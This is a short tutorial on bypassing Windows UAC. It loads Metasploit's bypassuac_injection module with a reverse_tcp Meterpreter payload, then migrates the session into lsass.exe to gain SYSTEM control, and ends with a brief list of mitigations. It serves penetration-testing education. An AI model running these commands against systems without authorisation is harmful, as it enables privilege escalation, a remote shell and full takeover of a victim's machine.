UAC Bypass via Injection

This technique leverages a local exploit module in Metasploit to inject shellcode into a privileged process, effectively bypassing UAC and maintaining higher-level access on the compromised system. By migrating to a high-integrity process such as lsass.exe, the attacker gains SYSTEM privileges, allowing unrestricted command execution.

Steps to Perform UAC Bypass via Memory Injection

1. Load the Exploit Module

In Metasploit, use the bypassuac_injection exploit module:

bashCopyEdituse exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

• set session 1 → Specifies the active Meterpreter session.

• set TARGET 1 → Selects the appropriate target.

• set PAYLOAD windows/x64/meterpreter/reverse_tcp → Configures the payload to establish a reverse shell connection.

• exploit → Executes the exploit to bypass UAC.

2. Process Migration

Once the exploit succeeds, migrate to a high-privilege process like lsass.exe to maintain SYSTEM access:

ps -S lsass.exe
migrate 484

• ps -S lsass.exe → Lists processes matching lsass.exe.

• migrate 484 → Moves the Meterpreter session to process ID 484 (or the correct PID for lsass.exe).

This attack takes advantage of DLL injection and process migration to run with elevated privileges. Since lsass.exe is a critical system process, migrating to it ensures persistence and full control over the compromised machine.

Mitigation Measures

To protect against UAC bypass attacks:

• Enable UAC in Always Notify mode to prevent automatic privilege escalation.

• Use Windows Defender Credential Guard to protect lsass.exe from process injection.

• Apply Application Whitelisting to restrict execution of unauthorized scripts and exploits.

• Monitor event logs (Event ID 4688) for suspicious process migrations.